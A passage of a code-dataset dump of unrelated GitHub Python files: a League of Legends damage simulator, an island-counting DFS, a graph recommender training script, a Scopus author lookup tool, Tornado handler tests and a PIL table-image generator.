f.write(data)\n f.truncate()\n\n print(\"All operations complete, exiting\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SilentNightSound/GI-Model-Importer","sub_path":"Tools/genshin_set_outlines.py","file_name":"genshin_set_outlines.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":1640,"dataset":"github-code","pt":"72"} +{"seq_id":"13534524490","text":"import lol_model1\nimport lol_model2\nimport numpy as np\n\nhealth = int(input('請輸入敵方血量:'))\narmor = int(input('請輸入敵方物防:'))\nmr = int(input('請輸入敵方魔防:'))\nlv = int(input('請輸入等級:'))\n\ncham = lol_model1.champion(lv, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)\nbot = lol_model2.Enemy(health, armor, mr)\n\n#使用英雄\ncham.Jayce(1)\n\n#寫入裝備 無盡需放最後\ncham.blade_of_ruined_king(1)\ncham.lord_dominiks_regards(0)\ncham.youmuus_ghostblade(0)\ncham.duskblade(0)\ncham.edge_of_night(0)\ncham.deaths_dance(0)\ncham.the_bloodthirster(0)\ncham.essence_reaver(0)\ncham.phantom_dancer(0)\ncham.rapid_firecannon(0)\ncham.statikk_shiv(0)\ncham.infinity_edge(0)\n\n# 計算面板攻速、物理攻擊以及敵方實際物防\ncham.AS += (cham.lv - 1) * 0.03 * cham.AS\ncham.ad += (cham.lv - 1) * 3.5\nbot.armor = bot.armor*(1-cham.pen)-cham.le\n\n#調整爆擊溢出\ndef p(cham):\n if cham.crit > 1:\n return 1\n else:\n return cham.crit\n\n\nprint('總花費:{}'.format(cham.cost))\nprint('物理攻擊:{},物理致命:{},物理穿透:{},攻速:{},爆擊機率:{}'.format(cham.ad,cham.le,cham.pen,cham.AS,p(cham)))\n\nn = int(input('請輸入攻擊次數:'))\ntimes = n / cham.AS\n\n# 設計傷害函數\ndamage = 0\nnumber = 0\n\nwhile number != n:\n c = np.random.binomial(1, p(cham), size = None)\n if c == 1:\n print('第{}下爆擊了!'.format(number+1))\n if cham.ie == 1:\n damage += 2*cham.ad*0.15 \\\n +2*cham.ad*0.85*(100/(100+bot.armor)) \\\n +2*cham.ex1 * 0.15 \\\n +2*cham.ex2*0.85*(100/(100+bot.mr)) \\\n +cham.chd*health*(100/(100+bot.armor)) \\\n +cham.ex1 * (100/(100+bot.mr))\n print('第{}下傷害為{}'.format(number+1, 2*cham.ad*0.15 \\\n +2*cham.ad*0.85*(100/(100+bot.armor)) \\\n +2*cham.ex1 * 0.15 \\\n +2*cham.ex2*0.85*(100/(100+bot.mr)) \\\n +cham.chd*health*(100/(100+bot.armor)) \\\n +cham.ex1 * (100/(100+bot.mr))))\n health -= 2*cham.ad*0.15 \\\n +2*cham.ad*0.85*(100/(100+bot.armor)) \\\n +2*cham.ex1 * 0.15 \\\n +2*cham.ex2*0.85*(100/(100+bot.mr)) \\\n +cham.chd*health*(100/(100+bot.armor)) \\\n +cham.ex1 * (100/(100+bot.mr))\n if health <= 0:\n health = 0\n else:\n health += 0\n print('第{}下傷害後,敵方剩下{}血量'.format(number+1,health))\n else:\n damage += 2*cham.ad*(100/(100+bot.armor)) \\\n + cham.ex1 * (100 / (100 + bot.mr)) \\\n + 2*cham.ex2 * (100 / (100 + bot.mr)) \\\n + cham.chd * health * (100 / (100 + bot.armor))\n print('第{}下傷害為{}'.format(number + 1, 2*cham.ad*(100/(100+bot.armor)) \\\n + cham.ex1 * (100 / (100 + bot.mr)) \\\n + 2*cham.ex2 * (100 / (100 + bot.mr)) \\\n + cham.chd * health * (100 / (100 + bot.armor))))\n health -= 2*cham.ad*(100/(100+bot.armor)) \\\n + cham.ex1 * (100 / (100 + bot.mr)) \\\n + 2*cham.ex2 * (100 / (100 + bot.mr)) \\\n + cham.chd * health * (100 / (100 + bot.armor))\n if health <= 0:\n health = 0\n else:\n health += 0\n print('第{}下傷害後,敵方剩下{}血量'.format(number + 1, health))\n else:\n print('第{}下沒爆擊!'.format(number + 1))\n damage += cham.ad*(100/(100+bot.armor)) \\\n + cham.ex1 * (100 / (100 + bot.mr)) \\\n + cham.ex2 * (100 / (100 + bot.mr)) \\\n + cham.chd * health * (100 / (100 + bot.armor))\n print('第{}下傷害為{}'.format(number + 1, cham.ad*(100/(100+bot.armor)) \\\n + cham.ex1 * (100 / (100 + bot.mr)) \\\n + cham.ex2 * (100 / (100 + bot.mr)) \\\n + cham.chd * health * (100 / (100 + bot.armor))))\n health -= cham.ad*(100/(100+bot.armor)) \\\n + cham.ex1 * (100 / (100 + bot.mr)) \\\n + cham.ex2 * (100 / (100 + bot.mr)) \\\n + cham.chd * health * (100 / (100 + bot.armor))\n if health <= 0:\n health = 0\n else:\n health += 0\n print('第{}下傷害後,敵方剩下{}血量'.format(number + 1, health))\n\n number += 1\n\ndps = damage / times\n\nprint('攻擊歷時{}秒鐘'.format(times))\nprint('一共對敵人造成{}傷害'.format(damage))\nprint('敵人最後剩下{}血量'.format(health))\nprint('每秒傷害量:{}'.format(dps))\nprint('每單位金錢買到的dps;{}'.format(dps / cham.cost))","repo_name":"Yan30672/python","sub_path":"LOL/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":4890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7668452249","text":"class Graph:\n \n def __init__(self, row, col, g):\n self.ROW = row\n self.COL = col\n self.graph = g\n self.islands = 0\n \n def MarkVisit(self, i, j): \n self.graph[i][j] = \"2\"\n if i-1 >= 0 and self.graph[i-1][j] == \"1\":\n return self.MarkVisit(i-1, j)\n if j-1 >= 0 and self.graph[i][j-1] == \"1\":\n return self.MarkVisit(i, j-1)\n if i+1 < self.ROW and self.graph[i+1][j] == \"1\":\n return self.MarkVisit(i+1, j)\n if j+1 < self.COL and self.graph[i][j+1] == \"1\":\n return self.MarkVisit(i, j+1)\n\n if i-1 >= 0 and j-1 >= 0 and self.graph[i-1][j-1] == \"1\":\n return self.MarkVisit(i-1, j-1)\n if j-1 >= 0 and i+1 < self.ROW and self.graph[i+1][j-1] == \"1\":\n return self.MarkVisit(i+1, j-1)\n if i+1 < self.ROW and j+1 < self.COL and self.graph[i+1][j+1] == \"1\":\n return self.MarkVisit(i+1, j+1)\n if j+1 < self.COL and i-1 >= 0 and self.graph[i-1][j+1] == \"1\":\n return self.MarkVisit(i-1, j+1)\n return\n \n def countIslands(self): \n for i in range(self.ROW):\n for j in range(self.COL):\n if self.graph[i][j] == \"1\":\n self.MarkVisit(i, j) \n self.islands += 1 \n \n\n# graph = [[1, 1],\n# [1, 1]]\n\ngraph = [[\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"0\",\"0\",\"1\",\"0\",\"0\"],\n [\"0\",\"0\",\"0\",\"1\",\"1\"]]\n\n# graph = [[\"1\",\"1\",\"1\",\"1\",\"0\"],\n# [\"1\",\"1\",\"0\",\"1\",\"0\"],\n# [\"1\",\"1\",\"0\",\"0\",\"0\"],\n# [\"0\",\"0\",\"0\",\"0\",\"0\"]]\n\n# graph = [[1, 1, 1, 0, 0],\n# [0, 1, 0, 0, 1],\n# [1, 0, 0, 1, 1],\n# [0, 0, 0, 0, 0],\n# [1, 0, 1, 0, 1]]\n \n \nrow = len(graph)\ncol = len(graph[0])\n \ng = Graph(row, col, graph)\n \nprint(\"Number of islands is:\")\ng.countIslands()\nprint(g.islands)","repo_name":"varanasikalyan/ds","sub_path":"tree/island_dfs_in.py","file_name":"island_dfs_in.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69915109992","text":"from helper import *\nfrom data_loader import *\n\nfrom model.models import *\nfrom model.lightgcn import LightGCNEngine\nfrom model.compgcn import CompGCNEngine\n\nfrom sklearn.model_selection import train_test_split\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Parser For Arguments', formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('-name',\t\tdefault='testrun',\t\t\t\t\thelp='Set run name for saving/restoring models')\n parser.add_argument('-model',\t\tdest='model',\t\tdefault='compgcn',\t\thelp='Model Name')\n parser.add_argument('-score_func',\tdest='score_func',\tdefault='conve',\t\thelp='Score Function for Link prediction')\n parser.add_argument('-opn', dest='opn', default='corr', help='Composition Operation to be used in CompGCN')\n\n parser.add_argument('-batch', dest='batch_size', default=128, type=int, help='Batch size')\n parser.add_argument('-gamma', type=float, default=40.0,\t\t\thelp='Margin')\n parser.add_argument('-gpu',\t\t type=str, default='0',\t\t\thelp='Set GPU Ids : Eg: For CPU = -1, For Single GPU = 0')\n parser.add_argument('-epoch',\t\tdest='max_epochs', \ttype=int, default=500, \thelp='Number of epochs')\n parser.add_argument('-l2', type=float, default=0.0,\t\t\thelp='L2 Regularization for Optimizer')\n parser.add_argument('-lr', type=float, default=0.001,\t\t\thelp='Starting Learning Rate')\n parser.add_argument('-lbl_smooth', dest='lbl_smooth',\ttype=float, default=0.1,\thelp='Label Smoothing')\n parser.add_argument('-num_workers', type=int, default=10, help='Number of processes to construct batches')\n parser.add_argument('-seed', dest='seed', default=41504, type=int, \thelp='Seed for randomization')\n\n parser.add_argument('-restore', dest='restore', action='store_true', help='Restore from the previously saved model')\n parser.add_argument('-bias', dest='bias', action='store_true', help='Whether to use bias in the model')\n\n parser.add_argument('-num_bases',\tdest='num_bases', \tdefault=-1, \ttype=int, \thelp='Number of basis relation vectors to use')\n parser.add_argument('-init_dim',\tdest='init_dim',\tdefault=100,\ttype=int,\thelp='Initial dimension size for entities and relations')\n parser.add_argument('-gcn_dim',\t \tdest='gcn_dim', \tdefault=200, \ttype=int, \thelp='Number of hidden units in GCN')\n parser.add_argument('-embed_dim',\tdest='embed_dim', \tdefault=64, type=int, \thelp='Embedding dimension to give as input to score function')\n parser.add_argument('-gcn_layer',\tdest='gcn_layer', \tdefault=1, \ttype=int, \thelp='Number of GCN Layers to use')\n parser.add_argument('-gcn_drop',\tdest='dropout', \tdefault=0.1, \ttype=float,\thelp='Dropout to use in GCN Layer')\n parser.add_argument('-hid_drop', \tdest='hid_drop', \tdefault=0.3, \ttype=float,\thelp='Dropout after GCN')\n\n # ConvE specific hyperparameters\n parser.add_argument('-hid_drop2', \tdest='hid_drop2', \tdefault=0.3, \ttype=float,\thelp='ConvE: Hidden dropout')\n parser.add_argument('-feat_drop', \tdest='feat_drop', \tdefault=0.3, \ttype=float,\thelp='ConvE: Feature Dropout')\n parser.add_argument('-k_w',\t \t dest='k_w', \t\tdefault=10, \ttype=int, \thelp='ConvE: k_w')\n parser.add_argument('-k_h',\t \t dest='k_h', \t\tdefault=20, \ttype=int, \thelp='ConvE: k_h')\n parser.add_argument('-num_filt', \tdest='num_filt', \tdefault=200, \ttype=int, \thelp='ConvE: Number of filters in convolution')\n parser.add_argument('-ker_sz', \tdest='ker_sz', \t\tdefault=7, \ttype=int, \thelp='ConvE: Kernel size to use')\n\n parser.add_argument('-logdir', dest='log_dir', default='./log/', help='Log directory')\n parser.add_argument('-config', dest='config_dir', default='./config/', help='Config directory')\n parser.add_argument('-output_dir', dest='output_dir', default='./results', help='Output directory for results')\n parser.add_argument('-checkpoint_dir', dest='checkpoint_dir', default='./checkpoints/', help='Output directory for model checkpoints')\n \n parser.add_argument('-pretrain', dest='pretrain', action='store_true', help='Whether to use bias in the model')\n parser.add_argument('-bce_drop', \tdest='bce_drop', \tdefault=0, \ttype=float,\thelp='BCE: Feature Dropout')\n parser.add_argument('-n_iter',\t \tdest='n_iter', \t\tdefault=1000, type=int, \thelp='Number of iterations for LightGCN Model')\n parser.add_argument('-bce_iter',\t \tdest='bce_iter', \t\tdefault=1000, type=int, \thelp='Number of iterations for BCE Pretraining Model')\n args = parser.parse_args()\n\n if not args.restore: args.name = args.name + '_' + time.strftime('%d_%m_%Y') + '_' + time.strftime('%H:%M:%S')\n\n set_gpu(args.gpu)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n \n print(f\"Using device {device}.\")\n\n if args.pretrain:\n compgcn_model = CompGCNEngine(args)\n compgcn_model.fit()\n user_embeddings = compgcn_model.model.state_dict()['user_embeddings']\n lightgcn = LightGCNEngine(args, device=device, pretrain_embs=(user_embeddings, compgcn_model.item_embed), ent2id=compgcn_model.ent2id, user2id=compgcn_model.user2id)\n else:\n lightgcn = LightGCNEngine(args, device=device)\n\n lightgcn.fit(iterations=args.n_iter)\n # lightgcn.cross_fit()\n \n for i in range(2, 5):\n print(f\"Recommendations for customer: {i}\")\n lightgcn.predict(str(i), num_recs=10)\n print('-'*100)","repo_name":"RusheelIyer/comp_lightgcn","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1019737871","text":"# load dependencies\nfrom elsapy.elssearch import ElsSearch\nfrom elsapy.elsclient import ElsClient\nfrom elsapy.elsdoc import AbsDoc\nimport pandas as pd\nimport json\nimport csv\nfrom datetime import datetime\n\n\ndef main():\n print(\"Please make sure to update the config.json file with your API key, INSTOKEN, and input data file path!\")\n print(\"input file must have a column named \\\"ID\\\"\"\n \"(unique ID for each article), a column named \\\"title\\\"(title of the article), \"\n \"and a column named \\\"year\\\"(publication year of the article). Please also observe the case!\")\n print(\"You also need to have elsapy and pandas installed to use this script\")\n\n user_input = input(\"Press Y to continue, and press any other key to exit \\n \")\n if user_input.lower() != 'y':\n exit()\n\n # read input data: a list of papers\n con_file = open(\"config.json\")\n config = json.load(con_file)\n con_file.close()\n\n input_df = pd.read_csv(config['input_file'])\n\n # create output file\n out_file_name = 'output_' + datetime.now().strftime('%Y-%m-%d-%H-%M-%S') + '.csv'\n\n error_log_name = initiate_error_log()\n\n with open(out_file_name, 'w', newline='', encoding='utf-8') as o:\n writer = csv.writer(o)\n writer.writerow(\n [\"ID\", \"original_title\", \"scp_title\", \"title_match(true/false)\", \"author_given_name\", 'author_surname',\n 'author_id'])\n\n for ID, title, year in zip(input_df['ID'], input_df['title'], input_df['year']):\n\n ## ensure correct data types\n ID = int(ID)\n title = str(title)\n year = int(year)\n\n scp_return = single_doc_processing(ID, title, year, error_log_name)\n\n if (scp_return != 'Empty set returned') \\\n and (scp_return != 'Read document failed') \\\n and (scp_return != \"No authors field in scp_doc\") \\\n and (scp_return != 'Other errors, likely query concatenation error'):\n my_authors = scp_return[0]['author']\n\n # check whether title matches\n set1 = set(title.lower().split(\" \"))\n set2 = set(scp_return[1].lower().split(\" \"))\n title_match = (set1 == set2)\n\n print('article ', str(int(ID)), ': number of authors ' + str(len(my_authors)))\n # write output\n for author_item in my_authors:\n writer.writerow([ID,\n title,\n scp_return[1],\n title_match,\n author_item['preferred-name']['ce:given-name'],\n author_item['preferred-name']['ce:surname'],\n author_item['@auid']])\n\n\ndef single_doc_processing(ID, title_str, year, error_log_name):\n \"\"\"\n Function: single_doc_processing\n :param ID: the id of the article\n :param title_str: the title\n :param year: the publication year\n :return: if processed, a dictionary called my authors, and the title retrieved from scopus\n \"\"\"\n\n # load configuration\n con_file = open(\"config.json\")\n config = json.load(con_file)\n con_file.close()\n\n # Initialize client\n client = ElsClient(config['apikey'])\n client.inst_token = config['insttoken']\n\n # try and execpt block: catch unprocessed cases\n try:\n title = '\\\"' + title_str + '\\\"'\n search_str = 'TITLE(' + title + ') ' + 'AND PUBYEAR = ' + str(year)\n print('\\n' + 'Query: ' + search_str) # allow user to visually check whether the query was correctly constructed\n\n doc_srch = ElsSearch(search_str, 'scopus')\n doc_srch.execute(client, get_all=True)\n\n if doc_srch.hasAllResults(): # retrieve the document\n my_scopus_id = doc_srch.results[0]['dc:identifier'].split(':')[1]\n scp_doc = AbsDoc(scp_id=my_scopus_id)\n\n if scp_doc.read(client):\n my_authors = scp_doc.data['authors']\n scp_title = scp_doc.title # save the retrieved title for later double checking\n if my_authors:\n return my_authors, scp_title\n else:\n print(\"No authors field in scp_doc\")\n error_log_writing(ID, \"No authors field in scp_doc\", error_log_name)\n return \"No authors field in scp_doc\"\n else:\n print(\"Read document failed.\")\n error_log_writing(ID, \"Read document failed.\", error_log_name)\n return 'Read document failed'\n else:\n print(\"Empty set returned\")\n error_log_writing(ID, \"Empty set returned\", error_log_name)\n return 'Empty set returned'\n except:\n print('Other errors, likely query concatenation error')\n error_log_writing(ID, 'Other errors, likely query concatenation error', error_log_name)\n return 'Other errors, likely query concatenation error'\n\n\ndef initiate_error_log():\n file_name = 'error_log_' + datetime.now().strftime('%Y-%m-%d-%H-%M-%S') + '.txt'\n file = open(file_name, 'w')\n file.close()\n return file_name\n\n\ndef error_log_writing(article_id, message, file_name):\n \"\"\"\n Function: error_log_writing\n :param article_id: the id of the article that did not get processed\n :param message: message about why this article was not processed\n :return: nothing\n \"\"\"\n error_log_file = open(file_name, 'a')\n error_log_file.write(str(article_id) + \": \" + message + '\\n')\n error_log_file.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"infoqualitylab/Scopus_author_info_tool","sub_path":"article_title_year_to_author.py","file_name":"article_title_year_to_author.py","file_ext":"py","file_size_in_byte":5674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14897076649","text":"import json\nimport StringIO\nfrom mock import patch as patch_mock\n\nfrom tornado import locale\nfrom tornado.web import Application, HTTPError\nfrom tornado.curl_httpclient import CurlError\nfrom tornado.httpclient import HTTPError as ClientHTTPError\nfrom tornado.httpclient import HTTPResponse\n\nfrom brainiak.handlers import BrainiakRequestHandler\nfrom tests.tornado_cases import TornadoAsyncHTTPTestCase\n\n\nclass TestBrainiakRequestHandler(TornadoAsyncHTTPTestCase):\n\n class Handler(BrainiakRequestHandler):\n\n def get(self):\n self.finish(\"TEST\")\n expected_summary = \"GET localhost:10007 (127.0.0.1)\"\n assert self._request_summary() == expected_summary\n\n def post(self):\n if self.request.body == \"500\":\n raise NotImplementedError(\"exception message\")\n elif self.request.body == \"400\":\n raise HTTPError(400, log_message=\"testing\")\n\n def put(self, unauthorized=False):\n if self.request.body == \"unauthorized\":\n raise ClientHTTPError(401, \"http error: unauthorized, back off\")\n elif self.request.body == \"400\":\n _buffer = StringIO.StringIO()\n _buffer.write(\"Malformed query\")\n response = HTTPResponse(self.request, 400, buffer=_buffer, effective_url=\"/a\")\n raise ClientHTTPError(400, message=\"Bad request\", response=response)\n elif self.request.body == \"500\":\n raise HTTPError(500, \"Internal Virtuoso Error\")\n else:\n raise CurlError(500, \"Virtuoso Down on port 8890\")\n\n def delete(self):\n self.finalize(None)\n\n def get_app(self):\n return Application([('/', self.Handler)],\n log_function=lambda x: None)\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_request_summary(self, log):\n response = self.fetch('/', method='GET')\n self.assertEqual(response.code, 200)\n self.assertTrue(response.body, \"TEST\")\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_400_error(self, log):\n response = self.fetch('/', method='POST', body=\"400\")\n expected_error_json = {\"errors\": [\"HTTP error: 400\\ntesting\"]}\n self.assertEqual(response.code, 400)\n self.assertEqual(expected_error_json, json.loads(response.body))\n\n @patch_mock(\"brainiak.utils.i18n.settings\", DEFAULT_LANG=\"en\")\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_400_client_error(self, log, settings):\n expected_error_message = [\"HTTP error: 500\\nAccess to backend service failed.\" +\n \" HTTP 400: Bad request.\\nResponse:\\nMalformed query\"]\n response = self.fetch('/', method='PUT', body=\"400\")\n self.assertEqual(response.code, 500)\n self.assertEqual(json.loads(response.body)[\"errors\"], expected_error_message)\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_500_error(self, log):\n response = self.fetch('/', method='POST', body=\"500\")\n expected_error_json = \"HTTP error: 500\\nException:\\nTraceback\"\n response_error_json = json.loads(response.body)\n self.assertEqual(response.code, 500)\n self.assertIn(expected_error_json, response_error_json[\"errors\"][0])\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_500_client_error(self, log):\n response = self.fetch('/', method='PUT', body=\"unauthorized\")\n self.assertEqual(response.code, 500)\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_500_http_error_500(self, log):\n response = self.fetch('/', method='PUT', body=\"500\")\n self.assertEqual(response.code, 500)\n\n\nclass TestUnmatchedHandler(TornadoAsyncHTTPTestCase):\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_get(self, log):\n response = self.fetch('/a/b/c/d/e', method='GET')\n self.assertEqual(response.code, 404)\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_put(self, log):\n response = self.fetch('/a/b/c/d/e', method='PUT', body='xubiru')\n self.assertEqual(response.code, 404)\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_post(self, log):\n response = self.fetch('/a/b/c/d/e', method='POST', body='xubiru')\n self.assertEqual(response.code, 404)\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_patch(self, log):\n response = self.fetch('/a/b/c/d/e', method='PATCH', body='xubiru')\n self.assertEqual(response.code, 404)\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_delete(self, log):\n response = self.fetch('/a/b/c/d/e', method='DELETE')\n self.assertEqual(response.code, 404)\n\n\nclass AuthenticatedAccessTestCase(TornadoAsyncHTTPTestCase):\n\n @patch_mock(\"brainiak.utils.i18n.settings\", DEFAULT_LANG=\"en\")\n def test_auth_access_with_invalid_user_returns_404(self, settings):\n response = self.fetch(\"/\", method='GET', headers={'X-Brainiak-Client-Id': '1'})\n self.assertEqual(response.code, 404)\n expected_body = {\"errors\": [u\"HTTP error: 404\\nClient-Id provided at 'X-Brainiak-Client-Id' (1) is not known\"]}\n computed_body = json.loads(response.body)\n self.assertEqual(computed_body, expected_body)\n\n def test_valid_client_id_from_another_client(self):\n response = self.fetch(\"/\", method='GET', headers={'X-Brainiak-Client-Id': 'another'})\n self.assertEqual(response.code, 200)\n\n\nclass TranslateTestCase(TornadoAsyncHTTPTestCase):\n\n class Handler(BrainiakRequestHandler):\n\n def get(self):\n locale.load_gettext_translations(directory=\"locale\", domain=\"brainiak\")\n user_locale = self.get_browser_locale()\n _ = user_locale.translate\n self.finalize(_(\"WORKING\"))\n\n def get_app(self):\n return Application([('/', self.Handler)],\n log_function=lambda x: None)\n\n @patch_mock(\"brainiak.handlers.logger\")\n def test_request_portuguese(self, mock_logger):\n headers = {\"Accept-Language\": \"pt_BR;q=0.8,en;q=0.2\"}\n response = self.fetch('/', method='GET', headers=headers)\n self.assertEqual(response.code, 200)\n self.assertTrue(response.body, \"FUNCIONANDO\")\n\n @patch_mock(\"brainiak.handlers.logger\")\n def test_request_default(self, mock_logger):\n response = self.fetch('/', method='GET')\n self.assertEqual(response.code, 200)\n self.assertTrue(response.body, \"WORKING\")\n","repo_name":"bmentges/brainiak_api","sub_path":"tests/integration/test_brainiak_handler.py","file_name":"test_brainiak_handler.py","file_ext":"py","file_size_in_byte":6921,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"73147409513","text":"'''\nAuthor: xinyan\nDate: 2023-06-13 17:12:25\nLastEditors: xinyan\nLastEditTime: 2023-12-12 09:23:48\nDescription: file content\n'''\n\n\nimport sys\nfrom PIL import Image, ImageFont, ImageDraw\n\n\ndef get_content_pos(rec_pos:list, content:str, font:ImageFont.FreeTypeFont, align:str='center'):\n content_list = content.split('\\n')\n c_w, c_h = 0, 0\n for item in content_list:\n w, h = font.getbbox(item)[2:]\n c_w = max(c_w, w)\n c_h = h * len(content_list)\n rec_width = rec_pos[2] - rec_pos[0]\n rec_height = rec_pos[3] - rec_pos[1]\n if align == 'center':\n return (int(rec_pos[0]+rec_width/2-c_w/2), int(rec_pos[1]+rec_height/2-c_h/2))\n elif align == 'right':\n return (int(rec_pos[0]+rec_width-c_w-5), int(rec_pos[1]+rec_height/2-c_h/2))\n elif align == 'left':\n return (int(rec_pos[0]+5), int(rec_pos[1]+rec_height/2-c_h/2))\n\ndef get_font(font_path:str=None, font_size:int=20):\n \"\"\"\n Returns a font object based on the given font path and font size.\n :param font_path: (str) The path to the font file. Default is None.\n :param font_size: (int) The size of the font to be returned. Default is 20.\n :return: (PIL.ImageFont.FreeTypeFont) The font object.\n \"\"\"\n if font_path:\n return ImageFont.truetype(font_path, font_size)\n else:\n if sys.platform == 'win32':\n return ImageFont.truetype('simhei', font_size)\n elif sys.platform in (\"linux\", \"linux2\"):\n return ImageFont.truetype('DejaVuSan', font_size)\n elif sys.platform == 'darwin':\n return ImageFont.truetype('PingFang', font_size)\n else:\n return ImageFont.load_default()\n\n\ndef generate_table_rec_coord(row_num:int, col_num:int, start_pos:list, margin:int=3, cell_width:int=150, cell_height:int=50,\n col_width_dict:dict={}, row_height_dict:dict={}, cell_merge_dict:dict={}):\n \"\"\"\n Generate the coordinates of each cell of the table.\n\n :param row_num: Number of rows in the table.\n :param col_num: Number of columns in the table.\n :param start_pos: Starting coordinate of the table in the image.\n :param margin: Space between cells of the table. Default is 3.\n :param cell_width: Width of each cell. Default is 150.\n :param cell_height: Height of each cell. Default is 50.\n :param col_width_dict: Specify the width of individual columns. For example,\n {0: 200} specifies the width of first column as 200. Columns without a specified width use the default width 150.\n :param row_height_dict: Specify the height of individual rows. For example,\n {1: 80} specifies the height of second row as 80. Rows without a specified height use the default height 50.\n :param cell_merge_dict: Information on merging cells. For example,\n {'0-0': [1,0], '0-1': [0, 2]} indicates that the cell at coordinate [0,0] needs to be merged,\n by merging 1 row downward and 0 columns to the right (i.e., not merging columns);\n The cell at coordinate [0,1] needs to be merged, by merging 0 rows downward and 1 column to the right.\n \"\"\"\n def get_combined_size(index:int, combine_cnt:int, size:int, size_dict:dict, margin:int):\n combine_size = sum(size_dict.get(idx, size) for idx in range(index, index + combine_cnt + 1)) + margin * combine_cnt\n return combine_size if combine_cnt > 0 else size_dict.get(index, size)\n\n def get_start_size(index:int, size:int, margin:int, size_dict:dict):\n total_size = sum(size_dict.get(i, size) + margin for i in range(index))\n return total_size if index else 0\n\n rec_pos_list = []\n skip_pos_key = []\n max_x, max_y = 0, 0\n for i in range(row_num):\n for j in range(col_num):\n pos_key = '{}-{}'.format(i, j)\n if pos_key in skip_pos_key:\n continue\n x0 = start_pos[0] + get_start_size(j, cell_width, margin, col_width_dict)\n y0 = start_pos[1] + get_start_size(i, cell_height, margin, row_height_dict)\n row_combine, col_combine = cell_merge_dict.get(pos_key, [0,0])\n x1 = x0 + get_combined_size(j, col_combine, cell_width, col_width_dict, margin)\n y1 = y0 + get_combined_size(i, row_combine, cell_height, row_height_dict, margin)\n max_x = max(max_x, x1)\n max_y = max(max_y, y1)\n rec_pos_list.append([x0, y0, x1, y1])\n for t_i in range(row_combine):\n skip_pos_key.append('{}-{}'.format(i+t_i+1, j))\n for t_j in range(col_combine):\n skip_pos_key.append('{}-{}'.format(i, j+t_j+1))\n for t_i in range(row_combine):\n for t_j in range(col_combine):\n skip_pos_key.append('{}-{}'.format(i+t_i+1, j+t_j+1))\n table_pos = [start_pos[0]-margin, start_pos[1]-margin, max_x+margin, max_y+margin]\n return rec_pos_list, table_pos\n\ndef __process_title_footnote(title_or_footnote:list, default_align:str, default_font_size:int, default_height:int, default_color:str) -> list:\n result_list = []\n for idx, content_dict in enumerate(title_or_footnote):\n content_dict['font_size'] = content_dict.get('font_size', default_font_size) if idx == 0 else content_dict.get('font_size', default_font_size-10)\n content_dict['color'] = content_dict.get('color', default_color)\n content_dict['align'] = content_dict.get('align', default_align)\n content_dict['height'] = content_dict.get('height', default_height) if idx == 0 else content_dict.get('height', default_height-20)\n result_list.append(content_dict)\n return result_list\n\ndef __get_max_width_title_footnote(title_list:list, footnote_list:list, font_path:str) -> int:\n max_width = 0\n for title in title_list:\n title_font = get_font(font_path, title['font_size'])\n max_width = max(max_width, title_font.getbbox(title['content'])[2])\n for footnote in footnote_list:\n footnote_font = get_font(font_path, footnote['font_size'])\n max_width = max(max_width, footnote_font.getbbox(footnote['content'])[2])\n return max_width\n\ndef __get_data_info(data_dict:dict, key:str, i, j, v_default, v_type):\n if type(data_dict.get(key, v_default)) == v_type:\n result = data_dict.get(key, v_default)\n elif data_dict[key].get(f'{i}-{j}', None):\n result = data_dict[key].get(f'{i}-{j}')\n elif data_dict[key].get(f'r{i}', None):\n result = data_dict[key].get(f'r{i}')\n elif data_dict[key].get(f'c{j}', None):\n result = data_dict[key].get(f'c{j}')\n else:\n result = v_default\n return result\n\n\ndef __calculate_data_cell_width_height(row_num:int, data_dict:dict, font_path:str, cell_width:int, cell_height:int):\n col_width_dict = {}\n row_height_dict = {}\n header_row = row_num - len(data_dict['content'])\n for i, data_line in enumerate(data_dict['content']):\n for j, data_content in enumerate(data_line):\n data_font = get_font(font_path, __get_data_info(data_dict, 'font_size', i, j, 20, int))\n c_w, c_h = 0, 0\n for item in data_content.split('\\n'):\n w, h = data_font.getbbox(item)[2:]\n c_w = max(c_w, w) + 20\n c_h = h * len(data_content.split('\\n')) + 20\n row_height_dict[i + header_row] = max(row_height_dict.get(i + header_row, cell_height), c_h)\n col_width_dict[j] = max(col_width_dict.get(j, cell_width), c_w)\n return col_width_dict, row_height_dict\n\n\ndef generate_table_pic(row_num:int, col_num:int, title_list:list, header_dict:dict, data_dict:dict, img_path:str=None, footnote_list:list=[],\n cell_width:int=150, cell_height:int=50, 